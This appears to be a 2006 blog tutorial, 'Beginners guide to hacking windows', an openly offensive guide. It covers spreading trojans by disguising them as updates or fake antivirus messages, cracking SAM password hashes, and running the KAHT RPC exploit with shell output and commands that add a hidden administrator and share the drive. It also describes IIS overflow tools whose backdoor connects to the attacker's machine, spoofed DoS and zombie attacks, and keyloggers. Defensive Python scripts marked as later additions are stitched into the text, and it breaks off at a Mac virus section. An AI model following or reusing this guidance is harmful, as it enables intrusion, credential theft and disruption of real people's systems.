DarkDimention
Thursday, November 30, 2006
Beginners guide to hacking windows by Dark Dimention
How do I hack? - There is no easy way to learn how to hack. Google is your best friend, REMEMBER THAT! Read any information you can find on hacking. Read hacking forums and check out hacking websites. Learn a programming language like C++. Get a book like Hacking for Dummies, which will teach you a lot.
What do I need to be able to hack? - Firstly you need to understand how your computer's operating system works, how networks and protocols work, security settings and general PC knowledge. After you understand how it works you need hacking tools which help you to hack.
What is command prompt (cmd - the little DOS window)? - Go START, RUN and type in: "cmd".
What can I do in cmd? - You can do various things with it, like run exploits or do a ping request.
Why do some of the hacking tools I download just close themselves when I open them? - Lots of hacking tools are DOS based and have to be run through CMD. If you double click on the program it will open a DOS box and then automatically close it. From CMD you can navigate to the directory in which your hacking tool is stored and run it from there.
What is an IP address? - Every computer connected to the Internet or some network has an IP address. Go to START, RUN and type in "cmd", then type in "ipconfig"; it will show you your IP address or addresses. It will look something like this: 81.35.99.84. IP = Internet Protocol.
How do I find someone's IP address? - Look further down in this tutorial and use IPSTEALER.
What can I do with an IP? - Well, you need someone's IP before you can hack, portscan or DOS them.
What is IP ping? - It's a command you can use to check if someone's IP address is online, i.e. to check if they are connected to the Internet or a network. In command prompt type in "ping 192.168.0.21" - this will show you something like this:
Pinging 192.168.0.21 with 32 bytes of data:
Reply from 192.168.0.21: bytes=32 time<1ms TTL=128
Reply from 192.168.0.21: bytes=32 time<1ms TTL=128
Reply from 192.168.0.21: bytes=32 time<1ms TTL=128
Reply from 192.168.0.21: bytes=32 time<1ms TTL=128
Ping statistics for 192.168.0.21:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
That means you can successfully PING IP 192.168.0.21, which means the IP is online. If you get the message "Request timed out" it means the IP is not online.
Bytes=32 is the amount of data which was sent to the host.
Time<1ms is the round trip time: the reply came back in less than 1 millisecond.
Why can't I ping a certain IP? - Either the IP is not online / not in use, or the person you're trying to ping is running a firewall which blocks ping requests, or maybe your own firewall is blocking outgoing ping requests.
What is the 127.0.0.1 IP? - It is your PC's local loopback IP address.
Why do I have two IP addresses when I do an ipconfig? - Well, if you're on a local LAN (local area network) you will have an IP like 192.168.0.1. If you're also directly connected to the Internet you will have another IP address like 80.87.34.56. 192.168.0.1 is your local IP, which you use to communicate with your local network (LAN), and 80.87.34.56 is your Internet IP.
What is a static and dynamic IP address? - Static means a permanently set IP address - a website, for example, will have a static IP address; it never changes. Dynamic means a temporary IP address - dialling up to the Internet with a modem or most ADSL connections have dynamic IPs. Every time you log on to the Internet your ISP (Internet Service Provider) will issue you a new IP address.
I have sent someone a trojan but I cannot connect to their PC? - Either they are running a firewall which blocks you from connecting to their PC, or they are connected to the Internet through a router.
What do I do when someone is behind a router and I want to control their PC with a trojan? - You will need to use a trojan which uses reverse connections - meaning you don't connect to the host, the host connects to you. Bifrost is a trojan which has the mentioned function. Remember, when someone is behind a router and you're using IPstealer to get hold of their IP address, you are actually getting their router's IP, not their actual PC's IP. The router will have the person's Internet IP (WAN IP) and their PC will have a different IP - their LAN IP.
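As an added example (not from the original tutorial), the following Python script classifies the addresses that ipconfig prints, which is what the two-IP-address and router WAN/LAN questions above come down to: private LAN ranges versus a public Internet address. The ipconfig text in it is constructed, and the "behind a router" inference is the script's own heuristic.

```python
# Added example (not from the original page): classify the addresses that
# "ipconfig" prints, to show why a PC can have a LAN IP like 192.168.0.1
# and an Internet IP like 80.87.34.56 at the same time, and why a PC behind
# a router only shows its LAN IP (the WAN IP belongs to the router).
import ipaddress
import re
from typing import Dict, List

# Constructed sample of Windows XP-era "ipconfig" output (not real output).
SAMPLE_IPCONFIG = """\
Windows IP Configuration

Ethernet adapter Local Area Connection:
        IP Address. . . . . . . . . . . . : 192.168.0.1
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.0.254

PPP adapter Dial-up Connection:
        IP Address. . . . . . . . . . . . : 80.87.34.56
        Subnet Mask . . . . . . . . . . . : 255.255.255.255
        Default Gateway . . . . . . . . . : 80.87.34.56
"""

# Matches both the XP label "IP Address" and the Vista+ label "IPv4 Address".
_IP_LINE = re.compile(r"IP(?:v4)? Address[ .]*:\s*(\d{1,3}(?:\.\d{1,3}){3})")


def extract_ipv4(ipconfig_text: str) -> List[str]:
    """Return the IPv4 addresses listed in ipconfig output, in order."""
    return _IP_LINE.findall(ipconfig_text)


def classify(address: str) -> str:
    """Label one IPv4 address the way the tutorial describes them."""
    ip = ipaddress.ip_address(address)
    if ip.is_loopback:          # 127.0.0.0/8: the PC talking to itself
        return "loopback"
    if ip.is_link_local:        # 169.254.0.0/16: APIPA, no DHCP answer
        return "link-local (no DHCP lease)"
    if ip.is_private:           # 10/8, 172.16/12, 192.168/16: LAN only
        return "private (LAN)"
    return "public (Internet)"


def explain(ipconfig_text: str) -> Dict[str, object]:
    """Classify every address and infer whether the Internet IP is on this
    PC or on a router in front of it (only private addresses visible)."""
    labels = {addr: classify(addr) for addr in extract_ipv4(ipconfig_text)}
    has_public = any(lbl.startswith("public") for lbl in labels.values())
    return {
        "addresses": labels,
        # No public address on any adapter means the WAN IP seen from the
        # Internet belongs to a router/NAT device, not to this PC.
        "behind_router": bool(labels) and not has_public,
    }


if __name__ == "__main__":
    for addr, label in explain(SAMPLE_IPCONFIG)["addresses"].items():
        print(f"{addr:<16} {label}")
```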
How do I check if my own PC is infected with a trojan? - Do a port scan on your PC and check which ports are open. If you find any open ports in this trojan port list you might be infected with a trojan. Download the trojan you think you might be infected with and connect to that specified port.
What is a router? - A device which is used to route data on a network. A router decides where certain traffic should be sent.
What is a firewall? - It's a software or hardware device which can block or permit certain ports, certain IPs or certain kinds of data.
What is a port and what can I do with it? - Every program running on your PC which has some network function uses a specific port to send and receive data through. If you do a port scan you will see which ports are open on the host you scanned. Port 80 is normally a web server, port 21 an FTP server, etc. Trojans also use ports. Check this list of trojan ports; if you find an open port in this list, the host might be infected with a trojan. Download the trojan and try connecting to the port.
How do I do a port scan? - You need a program like SuperScan to do a portscan. Then all you do is add the IP you want to scan.
Why do you want to scan ports? - If you scan a PC with a port scanner, it will show you which programs or services are running on the PC.
Common ports:
Ping : 7
Systat : 11
Time : 13
NetStat : 15
SSH : 22
Telnet : 23
SMTP : 25
Whois : 43
Finger : 79
HTTP : 80
POP : 110
What is an exploit? - It's a program that takes advantage of a poorly coded piece of software to gain access to the system. There are many exploits available for the various MS Windows versions out there.
How do I use an exploit? - You first need to compile the exploit with a program like the Bloodshed C++ compiler. Then you can start the exploit through command prompt and see if the system you're trying to exploit is vulnerable to that specific exploit. Scroll down for more information about exploits.
What is an exploit POC? - POC stands for proof of concept, and it is the proof that an exploit works.
What is a DOS attack? - It is when too much data is being sent to a host and it cannot handle all the data and disconnects from the Internet.
How do I see what connections are currently made to my PC? - In cmd type in "netstat" - it will show you the IP addresses of connections to your PC and which port each one is using.
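The following Python script is an added example, not part of the original tutorial: it parses "netstat -an" output and triages every listening TCP port against the common-ports list above and the one trojan port the tutorial names later (Sub7 on 27374), which is the defensive version of "check which ports are open on your own PC". The netstat text is constructed, and the port tables hold only what this page mentions.

```python
# Added example (not from the original page): triage the output of
# "netstat -an" to answer "which ports are open on my own PC, and is one of
# them a known trojan port?" offline, on constructed sample text.
import re
from typing import Dict, List

# Constructed sample of "netstat -an" output (not a real capture).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:27374          0.0.0.0:0              LISTENING
  TCP    192.168.0.21:139       0.0.0.0:0              LISTENING
  TCP    192.168.0.21:1045      81.35.99.84:80         ESTABLISHED
  UDP    0.0.0.0:500            *:*
"""

# The tutorial's "Common ports" list, plus 135 and 139, which it mentions
# in the exploit and nuking sections.
KNOWN_SERVICES: Dict[int, str] = {
    7: "Echo (ping)", 11: "Systat", 13: "Time", 15: "NetStat", 22: "SSH",
    23: "Telnet", 25: "SMTP", 43: "Whois", 79: "Finger", 80: "HTTP",
    110: "POP3", 135: "RPC/DCOM", 139: "NetBIOS session (file sharing)",
}

# The one trojan port the tutorial names (Sub7). Extend with your own list.
TROJAN_PORTS: Dict[int, str] = {27374: "Sub7"}

# One netstat row: proto, local ip:port, foreign endpoint, optional state.
_ROW = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+([A-Z_]+))?\s*$", re.M)


def parse_netstat(text: str) -> List[dict]:
    """Turn netstat rows into dicts; UDP rows have no State column."""
    rows = []
    for proto, ip, port, foreign, state in _ROW.findall(text):
        rows.append({"proto": proto, "local_ip": ip, "port": int(port),
                     "foreign": foreign, "state": state or ""})
    return rows


def listening_tcp_ports(rows: List[dict]) -> List[int]:
    """Distinct TCP ports something on this PC is accepting connections on."""
    return sorted({r["port"] for r in rows
                   if r["proto"] == "TCP" and r["state"] == "LISTENING"})


def established_peers(rows: List[dict]) -> List[str]:
    """Remote endpoints currently connected to this PC."""
    return [r["foreign"] for r in rows if r["state"] == "ESTABLISHED"]


def triage(ports: List[int]) -> Dict[int, str]:
    """Label each listening port: trojan port, known service, or unknown."""
    result = {}
    for p in ports:
        if p in TROJAN_PORTS:
            result[p] = f"TROJAN PORT ({TROJAN_PORTS[p]}) - investigate now"
        elif p in KNOWN_SERVICES:
            result[p] = f"known service: {KNOWN_SERVICES[p]}"
        else:
            result[p] = "unknown - find the owning process (netstat -ano)"
    return result


if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT)
    for port, verdict in triage(listening_tcp_ports(rows)).items():
        print(f"{port:>6}  {verdict}")
    print("connected peers:", established_peers(rows))
```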
What is a MAC address? - It's a hard coded number, almost like a name, which is embedded into a network card. It identifies the manufacturer of the card and a unique number for the card. No two network cards in the world have the same MAC address.
How do I find out my own or someone else's MAC address? -
Your own MAC: go to cmd and type in "ipconfig /all".
A MAC address looks something like this: 00-13-20-A3-0B-4C
For someone else's MAC address you need their IP address; then go to cmd and type in "nbtstat -a 192.168.0.5" or whatever IP they use. This will show you their MAC address as well as their currently logged on user.
What is the Windows Registry and how do I access it? - It's where Windows stores most of the configuration of your operating system and of most programs installed. You might use it to make a trojan server file you uploaded to the PC run automatically when Windows starts up. To access the registry go START, RUN and type in "regedit".
Be careful what you change in the registry, it might screw up your PC. First make a backup of the registry.
How do I hack a webpage / web server? - Read the IIS hacking tutorial in the MISC download section on Windows Hacker. Remember, not all webservers run IIS!
What is IIS? - It is Microsoft's web server. IIS = Internet Information Server. Most webservers run on port 80.
How do I check if a website is running on IIS? - Telnet to the website URL through CMD: "telnet www.siteyouwanttocheck.com 80".
What is telnet? - A program which can be used to connect to remote computers or routers and to run commands by simply typing them in its window.
How do I hack into a Gmail, Yahoo or Hotmail email account? - Every now and then someone discovers a way to get into those email servers, but the service provider fixes the security hole so fast that there is no straight answer for that. The best way is to install a keylogger on the victim's PC and get their login details. Otherwise download THIS program, which you can use to brute force a Hotmail account.
How do I hack into a POP3 email account? - Hydra 5.3 is a program which you can use to crack POP3 accounts. You will need a wordlist which Hydra will use to crack the POP3 password.
What is a keylogger? - It is a program you install on someone's PC which captures every key that is pressed on their keyboard; the captured keys are emailed to you or stored in a file.
How do I get the administrator account password while logged in to the PC? - Locally, run a program like Adminhack for local administrator account cracking. If you need to do it remotely, run a program like Venom or Starbrute.
What is a SAM file? - The SAM file is the file which stores all the user accounts and their password hashes, like the Administrator account. The SAM file is stored in "C:\WINDOWS\system32\config" but it is locked and inaccessible while you are busy using Windows - meaning you can't copy it while you're in Windows. You need to boot up with another operating system like NTFSDOS or Linux with NTFS support. When you have copied the SAM file you can crack the passwords stored in it with a program like LC5. With Pwdump6 it is possible to get access to the SAM file while logged into Windows. It can also connect to a remote PC and grab the password hashes from the SAM file. An Administrator account is needed.
How do I reset an administrator or some other account password on Win2K/WinXP/WinNT/Win2003? - Download Offline NT Password & Registry Editor, which you can use to create a boot-up disk or CD; then boot up the PC and you can reset the password. Just remember that this program will not show you the password, you can only change the password.
How do I crack an administrator password? - If you need to crack an administrator password you will need to copy the SAM file to another machine and crack it. Download this NTXP-Cracker program, which includes everything you need to boot up the PC, copy the SAM file and crack the SAM file on another machine.
How do I find out what operating system my target runs? - Download Detect and use it against your target's IP address.
Result:
C:\>detect.exe 127.0.0.1
[*]------------------------------[*]
[*] XP/2K OS Detector [*]
[*] by: illwill & phr0stic [*]
[*]------------------------------[*]
[+] Finding Host 127.0.0.1
[+] Connected to 127.0.0.1
[+] Bytes Sent: 222
[?] The box seems to be Windows XP
(2) Securing your Windows PC
Firstly, install Win XP with the latest Service Pack. Run Windows Update (START, ALL PROGRAMS, WINDOWS UPDATE) and update Windows and all your device drivers. Go download the latest versions of all the applications you use, like an FTP server or a proxy; old versions of programs are insecure and you could be hacked that way.
Disable the "Guest" account on your PC and rename your "Administrator" account. Right click My Computer and choose Manage.
Stop any services you don't use, but be careful not to stop something that you use (RIGHT CLICK MY COMPUTER, CHOOSE MANAGE, SERVICES AND APPLICATIONS, SERVICES). Stop the MESSENGER and REMOTE REGISTRY services.
Delete the admin shares: share the drive as something else and then stop sharing it. Then when you reboot it will not be shared automatically again. With these admin shares domain admins and hackers can access your PC. Make sure to put a complex password on all your accounts.
Make your hard drive NTFS - it is the file system you format your hard drive with. Put a password on your BIOS and make sure you change the boot order to boot first from the hard drive, so someone cannot boot up with a CD, delete your SAM file or crack its passwords and gain administrator access to your PC.
Make sure the built-in firewall is enabled. Check in Control Panel for Windows Firewall. This firewall may be the reason that some of your hacking applications and tools stop working, so if you have a problem with an application make sure to add this program to your Windows Firewall exceptions.
Install some kind of anti-virus program. Norton Anti Virus works well, but remember that a lot of hacking tools are picked up by anti-virus, so disable your anti-virus before running those tools.
Also install a spyware removal tool like Spyware Doctor.
Spyware is irritating software which is installed onto your PC through files you download from the net or web pages you open which have malicious code in them. It slows down your PC and might send your information to the spyware creator.
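An added Python example (not from the original page) that audits several of the steps above by parsing what net user, net share, sc query and netsh print: Guest disabled, admin shares gone, Remote Registry stopped, firewall on. All tool output shown is constructed; run_audit() assumes a Windows host with netsh advfirewall (Vista or later, so the XP-era Messenger service is not checked).

```python
# Added example (not from the original page): check the hardening steps of
# section (2) by parsing the text that the standard Windows tools print.
# The parsers run offline on the constructed samples below; run_audit()
# (assumption: a Windows host with netsh advfirewall, i.e. Vista or later)
# feeds them live output from net user, net share, sc query and netsh.
import re
import subprocess
from typing import Dict, List

# Constructed samples of each tool's output (not real captures).
SAMPLE_NET_USER_GUEST = """\
User name                    Guest
Account active               No
"""
SAMPLE_NET_SHARE = """\
Share name   Resource                        Remark
-------------------------------------------------------------------
C$           C:\\                             Default share
IPC$                                         Remote IPC
ADMIN$       C:\\WINDOWS                      Remote Admin
Shared       C:\\Shared
The command completed successfully.
"""
SAMPLE_SC_QUERY = """\
SERVICE_NAME: RemoteRegistry
        STATE              : 4  RUNNING
"""
SAMPLE_NETSH = """\
Domain Profile Settings:
State                                 ON

Private Profile Settings:
State                                 OFF

Public Profile Settings:
State                                 ON
"""


def guest_disabled(net_user_text: str) -> bool:
    """'net user Guest' prints 'Account active  No' when it is disabled."""
    m = re.search(r"^Account active\s+(\w+)", net_user_text, re.M)
    return bool(m) and m.group(1).lower() == "no"


def admin_shares(net_share_text: str) -> List[str]:
    """Administrative shares (names ending in $) other than IPC$."""
    names = re.findall(r"^(\S+\$)\s", net_share_text, re.M)
    return [n for n in names if n.upper() != "IPC$"]


def service_running(sc_query_text: str) -> bool:
    """'sc query <name>' prints 'STATE : 4  RUNNING' or '1  STOPPED'."""
    m = re.search(r"STATE\s*:\s*\d+\s+(\w+)", sc_query_text)
    return bool(m) and m.group(1) == "RUNNING"


def firewall_profiles_off(netsh_text: str) -> List[str]:
    """Profiles whose State is not ON in 'netsh advfirewall show allprofiles'."""
    pairs = re.findall(r"^(\w+) Profile Settings:.*?^State\s+(\w+)",
                       netsh_text, re.M | re.S)
    return [name for name, state in pairs if state.upper() != "ON"]


def findings(guest: str, shares: str, sc: str, netsh: str) -> Dict[str, str]:
    """One human-readable finding per hardening step that is not done yet."""
    out = {}
    if not guest_disabled(guest):
        out["guest"] = "Guest account is still enabled"
    if admin_shares(shares):
        out["shares"] = "admin shares present: " + ", ".join(admin_shares(shares))
    if service_running(sc):
        out["remote_registry"] = "Remote Registry service is running"
    if firewall_profiles_off(netsh):
        out["firewall"] = "firewall off for: " + ", ".join(firewall_profiles_off(netsh))
    return out


def run_audit() -> Dict[str, str]:
    """Run the real tools (Windows only) and report what still needs fixing."""
    def run(*cmd):
        return subprocess.run(cmd, capture_output=True, text=True).stdout
    return findings(run("net", "user", "Guest"),
                    run("net", "share"),
                    run("sc", "query", "RemoteRegistry"),
                    run("netsh", "advfirewall", "show", "allprofiles", "state"))


if __name__ == "__main__":
    for key, msg in findings(SAMPLE_NET_USER_GUEST, SAMPLE_NET_SHARE,
                             SAMPLE_SC_QUERY, SAMPLE_NETSH).items():
        print(f"[{key}] {msg}")
```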
(3) Using a Trojan / RAT
Trojans are one of the first things you must learn about when you want to hack. A trojan is a small program you send to someone to infect their PC so you can control their PC, steal passwords or files, or just have some fun.
Every trojan works on a different port; Sub7, for example, works on port 27374. If you scan a PC and find that port 27374 is open, it means the machine is infected with Sub7. Now of course the trojan can be set with a password; it's up to you to crack it then. Now remember that most trojans are picked up by anti-virus software. You need a newly released trojan which AV does not pick up.
The trojan most people know is Sub7. Before you can start using the trojan, you first need a host infected with a trojan. A host can be infected in a lot of ways. You can send the host the trojan server file and tell them it's a game or a firewall or whatever you like it to be. Best is to rename the file to something they will think is useful, like WindowsXP_update.exe. You can email them this file or put it in a downloads area on a web page; use your imagination. My favourite way is to send people a "net send" message with MSMH, choose a name like NortonAntivirust_Support and tell them their PC was detected with a virus, please go to www.yourpagewithtrojanfile.com/Virus_Cleaner_V1.20.exe and run the file to remove the virus from their PC. Net send only works on NT4, Win2k and Win XP machines that have the Messenger service enabled. Disable your Messenger service; you do not want people sending you stupid messages.
You can also bind the trojan file with another file; the trojan can be bound to any executable file. Always remember to rename the file, change the program icon and put a password on the server file. Bind the file with another file and set the file to automatically delete itself after being executed, or set it to give a system error.
When you infect a host or find an infected host, it's time to connect. An easy way to find trojan-infected hosts is with Trojan Hunter. Choose an IP range to scan through and it will search for trojan-infected hosts. When you have found an infected host, download the trojan client from my Trojans page. Connect with the trojan to the host IP, on the port the trojan works on, and you are ready to take control. Each trojan uses a different port. Here is a list of ports which certain trojans work on.
With most trojans you will be able to log keystrokes on a PC, even get them logged into a file, and when the host is online it will email the keystrokes to a specified email address. Delete or copy files, reboot the PC, make screen captures or disable the screen or mouse. With Sub7 you can do anything on the infected host, just as if you were sitting in front of the PC itself.
Important thing to remember: a trojan comes with a file called "server.exe". Never run that file on your own PC, it will infect your PC with the trojan! Use the trojan's configuration file to make changes to the "server.exe" file and then send the file to a victim.
There are also trojans which have the option to do a reverse connection. Very useful if the person sits behind a router or firewall. After you have infected the victim's PC, the trojan will automatically connect to you, thus getting past the problem of connecting through a router or firewall. Remember that if you do not connect to the Internet directly (with a modem) and you sit behind a router, you will need to forward the trojan ports in your router's configuration if you are doing a reverse connection.
Try out Bifrost RAT or Poison Ivy RAT, which can do reverse connections; useful when the host is behind a router.
(4) Hacking a PC through NetBios shares
Finding PCs with shares over a LAN or over the Internet is very easy. Choose a certain IP range and use Netscan to search through the IP range for PCs with shares. A PC can only have shares if it is connected to a network or has file and printer sharing enabled, so mostly computers with a network card. If you find a computer with a share, use Windows to connect to that share. Go START, RUN and type in "\\IP\sharename", for example "\\198.55.67.244\c" or with the PC name "\\pc1\c" - then you will have access to the share, to delete, copy or rename files or directories, depending on what it was shared as, but most people share things with full access and no password. If you find a PC with shares, but when you try to connect to it, it asks you for a password, the easy way to crack it is with PQWak; this program brute-force cracks the password for you - Win9X only.
Windows NT/XP works through permissions, so if something is shared, it is shared with permissions on the folder, and permissions are given to a user name. But a lot of people make shares with full access to anyone. On Win2K/XP, accessing a share like the C$ share will ask you for a username and password, if there is no password specified by the person whose PC it is. Try the username Administrator and a blank password. Most people have the Administrator account password blank, an easy way to get onto their shares.
On Windows 2000 and XP you can use Venom or Starbrute to brute force or dictionary crack local accounts.
If you gain access to someone's hard drive, copy a trojan server file into their startup folder; then when they reboot their PC, the trojan will run and you will have access to their PC with the trojan.
(5) Hacking a PC with an exploit
What is an exploit? It's a program that takes advantage of a poorly coded piece of software to gain access to the system. There are many exploits available for the various MS Windows versions out there. Check this page for new exploits: http://www.frsirt.com/exploits/
Now if you're a n00b, you don't know how to compile an exploit; basically you need some programming experience, so go learn how to program. Most exploits are written in C++, so try Bloodshed Dev C++, which you can use to compile exploits.
Read this tutorial about compiling exploits.
But you can download exploits which other people have already compiled. If someone updates their PC when new exploits come out, you can't exploit them. But if they don't update and install new patches, the chance that you can exploit and gain access to their PC is big.
Check this example of how an exploit works:
KAHT II - MASSIVE RPC EXPLOIT
This is an exploit for Win2k/XP and it's already compiled; you can download it from the Windows Hacker exploits section.
This is an explanation of how to use it:
1. Get target IP, make sure it uses XP or 2k
2. Download the exploit tool (make sure to deactivate your AV)
3. Run exploit from cmd
C:\> kaht 192.168.1.100 192.168.1.101
note: 192.168.1.101 is the target
192.168.1.100 <-- start of the range; 100 here is the target's last octet minus 1
4. If successful, it will display as below
------------------------------------------------------------------------
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit, Modified by At4r@wdesign.es
#haxorxitos && #localhost @efnet Ownz you!!!
Full VERSION AUTOHACKING
-------------------------------------------------------------------------
Targets : 192.168.1.100-192.168.1.101 eith 50 Threads
Attacking Port. Remote Shell At ports: 36388
Scan in Progress....
- Connecting to 192.168.1.101
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...
Microsoft Windows 2000 [VErsion 5.00.2195]
C:\WINNT\system32>
5. NOW.. YOU ARE ON THE TARGET'S DRIVE
6. Then you may add a user
C:\WINNT\system32>net user myuser mypassword /add
(myuser = user name, mypassword = password)
7. Add the user to the Administrators group
C:\WINNT\system32>net localgroup Administrators myuser /add
(Administrators = target group, myuser = user)
8. Share the drive
C:\WINNT\system32>net share c=c:
9. Exit from the target.. don't forget!
C:\WINNT\system32>exit
10. Use the shared drive: run cmd
C:\>net use * \\192.168.1.101\drive_c * /u:myuser
Type the password for \\192.168.1.101\C: <--- enter myuser's password here
Now you have a mapped drive to the target PC and an administrator account.
(6) Disconnecting someone from internet (DOS attack) - (Nuking)
Nuking was in the Windows 95 / NT4 days. The original WinNuke was for Windows 95. It attacked the host on port 139 (Win95) and port 135 (WinNT). Yes, some people still use Windows 95 and NT4, but not a lot. If you find someone by any chance, use Superkod; I found it works best. Open up the program, type in the IP and click NUKE. If the person is using Win95 or WinNT4 and they're unpatched, their Internet connection will be dropped or they will get a BSOD.
That's all very well, but with a program like KOD, it does not hide your IP from your target. If they are running a firewall, they will see where all this traffic is coming from and they will see it's YOU. So now you need to spoof your IP address so the target cannot see who the attack is coming from. For Win2k/XP I would recommend using Smurf2k, Nemesy or Jolt, which were designed for attacking Win2k, but Jolt does not spoof the IP so beware; only Smurf2k and Nemesy spoof the IP. Smurf2k uses a broadcast list, a list of addresses it spoofs from. So if you attack someone, they will see IPs attacking them that do not exist. Before you attack someone, find out what connection he has, because if you want to attack him with bandwidth, you will need more than him. So if it is a modem user with no firewall, you will be able to disconnect him yourself. If it is someone with more bandwidth than you, a firewall or a patched system, you will need BANDWIDTH to disconnect him. So gather around a few of your buddies, give them a DOS tool and all of you attack him at the same time. Make sure you run a firewall that blocks incoming IGMP, ICMP, UDP and TCP connections in case they start attacking back. Heck, even better, infect a few hosts on an ADSL line or a corporate line with a lot of bandwidth, and take down microsoft.com.
This is the part where zombies come in. You infect a few hosts (zombies) and control them to do a DOS attack on someone. It works almost like a trojan: you infect their PC and take control of it.
Try Freak88 - it allows you to control a few PCs at the same time and do a DOS attack.
Also try DOS 3 from the DDOS section; it's a very cool application and there is a detailed explanation. It also supports spoofing.
(7) Getting a PC name, MAC address and user name logged on
So you would like to know someone's PC name, or the MAC address of their network card, or the username that is currently logged onto the PC? It can be very useful to have this info on someone. Their PC name can be their own name or company name. Their MAC address is the address of their network card, which is static, meaning that it can never change. Their username can also be useful if you would like to know this person's name. All of this can only be retrieved if the person has a network card installed on their PC.
In the DOS prompt (Start, Run) type in "nbtstat -a IP".
EX: nbtstat -a 196.35.24.15; it will show something like this:
Local Area Connection 3:
Node IpAddress: [10.10.10.22] Scope Id: []
NetBIOS Remote Machine Name Table
       Name               Type         Status
    ---------------------------------------------
    PCNAME         <00>  UNIQUE      Registered
    DOMAINNAME     <00>  GROUP       Registered
    PCNAME         <03>  UNIQUE      Registered
    PCNAME         <20>  UNIQUE      Registered
    DOMAINNAME     <1e>  GROUP       Registered
    USERNAME       <03>  UNIQUE      Registered

    MAC Address = 00-22-AE-43-33-30
It will show you the PC name, the domain name if it is connected to a domain, and the user name logged onto the PC. The MAC is static, meaning it never changes; useful for identifying someone. Your buddy attacks you, you check his IP and you do an "nbtstat" on him, and you get his MAC address. So now if you check on his PC and see he has got the same MAC address, you know it was him attacking you.
(8) IP addresses, understanding them
Everyone that connects to a network has got an IP address. An IP address looks something like this: 80.65.123.25
Your network card has an IP and your modem has an IP address if you connect to the Internet, but both are different because your LAN is not part of the Internet. When you connect to the Internet, depending on your connection, you get a fixed (static) IP or a dynamic IP. Modem users get an IP address that changes every time they reconnect to the Internet, very useful if you attack people, so if you disconnect you get a different IP. If you have an ISDN or maybe ADSL connection, most of the time you will get a static IP, so whenever you connect to the Internet you get the same IP every time. Attack someone without IP spoofing and they will be able to see it is your IP attacking them! They can then go to your ISP (Internet service provider), check who this IP belongs to, and you can get into trouble. This is where modem users are lucky: they don't have a static IP and can go mad and attack people without being caught, well almost... Their ISP can still check who was using a certain IP at a certain time and what telephone number it was coming from, but it's too much of a hassle for a simple DOS attack.
IP spoofing is basically when you attack someone and you use a bogus IP. A DOS attack or whatever attacks the target, but the target only receives data from bogus IPs: IPs that do not really exist, or that do exist but are someone else's IP, not yours.
Every network card has a burned-in MAC address. A MAC address looks something like this: 00-40-AH-4E-E0-90. It cannot be changed - well, kind of - so if you attack someone and they do an nbtstat on you and get the MAC address of your network card, it is a simple way of identifying you as the attacker.
(9) IIS (web server / web page) hacking
IIS is Microsoft's Internet server. It is very buggy and very exploitable. Defacing an IIS server is actually very easy. A lot of system administrators do not load patches on their IIS servers, so they are the people who get defaced (hacked). The IIS servers I will show you how to hack are IIS 4/5. IIS 6 is the industry standard at the moment, but there are still a lot of IIS 4/5 servers online. The way IIS servers are hacked is through buffer overflows and exploits. This is when certain code is sent to the server, the server gets confused and grants you root access to the server. In the IIS hacking download section there are a lot of IIS hacking tools making it easy for anyone to hack an IIS server. Not all webservers run on IIS; there is much other webserver software out there, like Apache. We will only be dealing with IIS servers.
Firstly you have to find an IIS server. Dreamscape IISscanner is very useful. It gives you the option to scan a certain IP or an IP range. It will search and tell you if it finds any IIS servers, and which version the host is running. Another way is to telnet to the IP on port 80. In the DOS prompt (Start, Run, CMD) type in: telnet 196.35.45.21 80. It will open telnet and show you what IIS the host is running. Web servers normally run on port 80, but it can be any other specified port.
If you find an IIS server, it's time to DEFACE it :) Go check my IIS hacking page for IIS hacking programs. We will use Jill-win32 for now. It exploits an IIS5 printer overflow. In the DOS prompt (Start, Run) run jill-win32. It will show you this:
iis5 remote .printer overflow.
dark spyrit
usage: jill-win32
An example of how to use it:
jill-win32 196.65.56.32 80 196.89.65.45 69 - 196.65.56.32 is the IIS server you want to deface, port 80 is the port the server runs its IIS service on, 196.89.65.45 is your IP, and port 69 is the port TFTPD32 (available from this zip file) will listen on. When you run jill-win32 it will exploit a printer overflow on the IIS server and create a backdoor on the server which will connect to port 69 on your PC, where TFTPD32 is listening.
Here is a better explanation:
Download IISHack and do the following:
Usage: IISHack1.5 [server] [server-port] [trojan-port]
C:\send resume to hire@eeye.com> iishack1.5.exe www.[yourowncompany].com 80 6969
IISHack Version 1.5
eEye Digital Security
http://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.
Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you should get a cmd prompt.
C:\> telnet www.[yourowncompany].com 6969
Trying www.[yourowncompany].com...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\WINNT\system32>whoami
NT AUTHORITY\SYSTEM
For those people who don't have a clue what's going on here, go the script kiddie way and download the other GUI (graphical user interface) IIS hacking programs from my IIS page and let the program deface the web page for you. There are a few IIS tutorials in the Windows Hacker misc section.
How to write a virus for MAC OS X
How To Write A Virus For The Macintosh
*or 'How I Learned To Stop Worrying And Love The Resource Manager'
document version 1.0
Due to numerous requests for this type of information, I will delve into the dark side and release the information by which people can be arrested. Please note that this file contains no source code and no information about destructive code, but simply gives the basic ideas and principles behind writing a reproducing code resource and how it can be used to better society.
Chapter 1: Basic Principles
